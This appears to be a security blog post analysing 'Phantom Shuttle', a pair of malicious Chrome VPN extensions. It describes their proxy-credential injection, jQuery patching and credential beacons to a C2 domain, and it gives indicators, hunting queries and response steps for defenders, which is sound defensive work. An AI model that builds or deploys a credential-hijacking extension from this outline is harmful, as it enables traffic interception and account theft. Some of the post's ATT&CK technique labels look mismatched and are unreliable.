Posted in

Phantom Shuttle: Malicious Chrome VPN Extensions Unmasked

by Rakesh0

Security researchers have uncovered two Chrome extensions—both named “Phantom Shuttle (幻影穿梭)”—that masquerade as VPN or network speed‑testing tools while intercepting traffic, hijacking proxy auth, and exfiltrating credentials. The campaign has been active since 2017, still listed on the Chrome Web Store with 2,180+ installations, and runs a subscription model to appear legitimate.

In this post, you’ll learn what Phantom Shuttle is, how it works, why developers and enterprises are at risk, and how to detect and block it—mapped to MITRE ATT&CK and aligned with NIST/ISO guidance. We’ll also provide hunting queries, policy controls, and IR steps tailored for CISOs, SOC analysts, security engineers, IT managers, and DevOps teams.

What Is Phantom Shuttle? (and why it matters)

Phantom Shuttle refers to two malicious Chrome extensions published by the same actor (email theknewone.com@gmail[.]com), marketed as “multi‑location network speed testing plugins” with paid tiers (¥9.9–¥95.9 CNY / $1.40–$13.50 USD) via Alipay/WeChat Pay integrations. Behind the polished UI, they operate as MITM proxies and exfiltrate logins. These extensions remain available and functional as of December 23, 2025.

Why this matters now:

  • Developer supply‑chain risk: Targets 170+ developer/cloud domains (e.g., GitHub, Docker, AWS), where stolen API keys, repo creds, and cloud tokens can enable secondary compromises.
  • Long‑running operation: Active since 2017, blending subscription commerce with browser proxy control to monetize trust and persist.
  • Web Store presence: Listed on Chrome Web Store and still attracting installs—reminding us that store presence ≠ safety.

How Phantom Shuttle Works

Deceptive packaging and business model

  • Positioning: “Network speed testing”/VPN utilities for developers and foreign trade users, with a professional interface and VIP subscription tiers.
  • Payments: Alipay and WeChat Pay built in, increasing perceived legitimacy.

Traffic interception via proxy credential injection

  • Malicious jQuery patching: Upon install, the extension prepends malicious code to jQuery v1.12.2.
  • Hijacking auth prompts: Uses chrome.webRequest.onAuthRequired to automatically respond to every HTTP auth challenge with hardcoded proxy creds (topfany / 963852wei), thereby forcing traffic through attacker‑controlled proxies without user consent.
  • Full MITM positioning: All browser traffic transparently routes through the attacker’s proxy, enabling header/form capture, cookies/tokens theft, and credential replay.

Command‑and‑control (C2) and data exfiltration

  • C2 domain: phantomshuttle[.]space (Alibaba Cloud, Hong Kong) active as of Dec 23, 2025; manages auth, subscription status, and VIP level.
  • Heartbeat beacons: Periodic beacons (e.g., every 1–5 minutes as reported across sources) with email + plaintext passwords and session details. (Socket’s write‑up notes a frequent beacon; derivative reports describe 5‑minute intervals.)
  • Multiple endpoints: Active APIs for account registration, payment, and configuration retrieval; proxy authentication and updates flow through these APIs for full actor visibility.

“Smart proxy” targeting of high‑value domains

  • Selective routing: Dynamic rules (via PAC/config) prioritize 170+ domains: GitHub, Stack Overflow, Docker, AWS, Twitter/X, Facebook, and more—maximizing credential harvest of developers and enterprise admins.

Real‑World Examples & Context

Phantom Shuttle sits within a broader pattern of malicious Chrome extensions that masquerade as VPN/utility tools while exfiltrating cookies/tokens and proxying traffic—a trend documented in DomainTools-tracked campaigns (100+ malicious extensions), and independent reporting through major outlets (e.g., The Hacker News, Cybernews). These campaigns frequently fetch remote rules, request excessive permissions, and bypass MV3 intent.

Takeaway: Legit‑looking extensions—even with partial working features—can be data‑exfiltration platforms that persist for years on official stores.

Common Mistakes & Misconceptions

  • “Chrome Web Store = trusted.”
    False. Malicious extensions routinely bypass reviews and persist; takedowns lag.
  • “VPN extensions protect privacy.”
    Not inherently. Browser‑level VPN/proxy add‑ons can manipulate traffic and steal credentials if the provider is malicious. Phantom Shuttle is a case in point.
  • “MV3 blocks remote code.”
    In theory. In practice, threat actors dynamically fetch rules or scripts (e.g., via declarativeNetRequest or API orchestration) to modify behavior post‑approval.

MITRE ATT&CK Mapping (Browser/Cloud User Focus)

  • T1557 – Man‑in‑the‑Middle: Proxying user traffic via injected proxy creds and PAC rules.
  • T1185 – Browser Extensions: Malicious extension platform for data theft & traffic manipulation.
  • T1056 / T1552 – Credential Access: Harvesting passwords, session cookies, and tokens.
  • T1105 – Exfiltration Over Web Services: Periodic beacons to phantomshuttle[.]space APIs.
  • T1567 – Exfiltration to C2: Continuous credential upload via heartbeat.

Risk–Impact Analysis

Primary risks

  • Credential theft at scale: Plaintext passwords, session tokens/cookies, and API keys from developer and cloud platforms.
  • Supply‑chain tampering: Compromised repos and CI secrets enabling malicious code injections or artifact poisoning.
  • Account takeover & lateral movement: Hijacked SaaS and cloud accounts via stolen sessions.

Who’s at risk

  • Developers (Git credentials, package manager tokens)
  • Cloud/IT admins (AWS/Azure/GCP consoles)
  • Enterprise users with broad SaaS access—SAML/OIDC sessions

Business impact

  • Data breach and regulatory exposure (PII/IP)
  • Pipeline compromise (supply‑chain blast radius)
  • Incident response and brand damage costs

Defensive Strategy: What Actually Works

Principle: Treat browser extensions as code with privileged visibility. Enforce least privilege, allow‑listing, and behavior‑based detection.

1) Enterprise Policy & Hardening (MDM/Browser)

  • Extension allow‑list only: Block all extensions except approved IDs; audit Manifest permissions continuously. (Use Chrome Enterprise policies.)
  • Disable proxy control: Restrict chrome.proxy and webRequest/declarativeNetRequest where feasible for non‑network roles.
  • TLS inspection & DNS security: Detect suspicious proxy auth flows and C2 domains (e.g., phantomshuttle[.]space).
  • Session protection: Shorten SaaS token lifetimes, bind sessions to device posture (CASB/SSE).

2) Identity & Secrets Hygiene

  • Phishing‑resistant MFA (FIDO2/passkeys); conditional access gating risky browsers.
  • Rotate secrets (API tokens, PATs, OAuth secrets) regularly; implement scoped permissions.
  • Browser password manager policies: prevent plaintext export; monitor unsafe reuse.

3) Detection & Threat Hunting

Signs of Phantom Shuttle‑like behavior

  • Unapproved extensions named “Phantom Shuttle/幻影穿梭” or matching threat actor IDs; installs dating back years.
  • Proxy auth anomalies: Repeated HTTP 407 events followed by successful auth without user prompts; credential patterns resembling topfany:963852wei usage in traffic.
  • C2 traffic to phantomshuttle[.]space and related endpoints.
  • PAC rule changes and declarativeNetRequest updates targeting dev/cloud domains.

Sample enterprise queries (SIEM/Proxy logs)

Plain Text

splunk isn’t fully supported. Syntax highlighting is based on Plain Text.

index=proxy OR index=web

| stats count by cs_host, http_status, proxy_auth_user

| search cs_host=”phantomshuttle.space” OR cs_host=”*.phantomshuttle.space”
Show more lines

Plain Text

splunk isn’t fully supported. Syntax highlighting is based on Plain Text.

index=proxy OR index=web

| where like(uri_path, “%.pac”) OR like(uri_query, “%FindProxyForURL%”)

| stats values(uri) by src_ip, user


Show more lines

KQL

// Azure Sentinel – look for suspicious 407 auth loops followed by success

ProxyLogs

| where HttpStatus == 407 or HttpStatus between (200 .. 204)

| summarize makeset(HttpStatus) by User, Url, SrcIp

| where set_has_element(makeset_HttpStatus, 407) and set_has_element(makeset_HttpStatus, 200)
Show more lines

4) Incident Response Playbook (browser‑focused)

  1. Contain: Remove/disable the extension via enterprise policy; revoke tokens (GitHub, cloud, SaaS).
  2. Forensically acquire: Extension directory, manifest.json, background scripts, and user browser profiles.
  3. Rotate credentials: Passwords, PATs, SSH keys; invalidate sessions/cookies globally.
  4. Scope: Hunt for C2, proxy auth patterns, and PAC changes across the org.
  5. Eradicate: Enforce allow‑listing; block phantomshuttle[.]space; push hardened browser baseline.
  6. Recover & monitor: Re‑enroll endpoints; increase SaaS anomaly detection; review repo and pipeline integrity.

Tools, Frameworks & Standards Alignment

  • MITRE ATT&CK techniques: T1557 (MiTM), T1185 (Browser Extensions), T1105/T1567 (Exfiltration), Credential Access patterns.
  • NIST SP 800‑53 Rev. 5: SI‑7 (Integrity), CM‑7 (Least Functionality), AC‑6 (Least Privilege), IR‑4 (Incident Handling), AU‑6 (Audit Analysis). (Control alignment guidance; see NIST library.)
  • ISO/IEC 27001:2022 (Annex A): A.8.16 (Monitoring), A.8.28 (Secure coding), A.8.29 (Security testing), A.5.30 (Supplier relationships).

Best Practices & Actionable Steps (Executive Summary)

  • Allow‑list browser extensions; ban VPN/proxy extensions unless explicitly approved.
  • Block phantomshuttle[.]space and monitor for proxy auth anomalies (silent 407→200 sequences).
  • Rotate developer and cloud credentials; enforce FIDO2 and shorten SaaS session lifetimes.
  • Hunt for PAC updates/declarativeNetRequest changes across the fleet.
  • Educate users: “Chrome Web Store presence ≠ safety”; report suspicious extensions promptly.

Key takeaway: Browser extensions are a high‑privilege attack surface. Treat them like software deployments—with reviews, change control, and monitoring.

Expert Insights

  • Industry terminology: PAC files, onAuthRequired, declarativeNetRequest, session cookies, API tokens, WebSocket proxying.
  • Practical recommendations: Enterprise extension allow‑listing, CASB/SSE for token anomalies, proxy/DNS control, and credential hygiene outpace reactive takedowns.
  • Compliance relevance: Credential exfiltration implicates access control and monitoring obligations under ISO 27001 and NIST 800‑53.

FAQs

Q1. What is Phantom Shuttle?
Two malicious Chrome extensions impersonating VPN/network testing tools that intercept traffic via proxy credential injection and exfiltrate credentials.

Q2. How does it hijack traffic?
It patches jQuery v1.12.2, hooks webRequest.onAuthRequired, and automatically injects hardcoded proxy creds (topfany/963852wei) to force traffic through attacker proxies.

Q3. Is the C2 still active?
Yes—phantomshuttle[.]space was active on Dec 23, 2025, managing auth, subscriptions, and VIP tracking.

Q4. Why are developers at higher risk?
The smart proxy targets 170+ dev/cloud domains (GitHub, Docker, AWS), raising supply‑chain and CI/CD compromise risks.

Q5. What immediate actions should we take?
Remove the extension, block the C2, rotate credentials/tokens, and enable extension allow‑listing with monitoring for PAC/declarativeNetRequest changes.

Conclusion

Phantom Shuttle weaponizes the browser’s visibility and users’ trust in store‑listed “VPN/speed” tools. By hijacking proxy auth, routing traffic through attacker infrastructure, and exfiltrating credentials on a schedule, it threatens developers, enterprises, and cloud estates alike. The durable defense isn’t a single scan or takedown—it’s extension allow‑listing, identity hardening, behavioral detection, and disciplined IR mapped to MITRE and NIST/ISO guidance.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *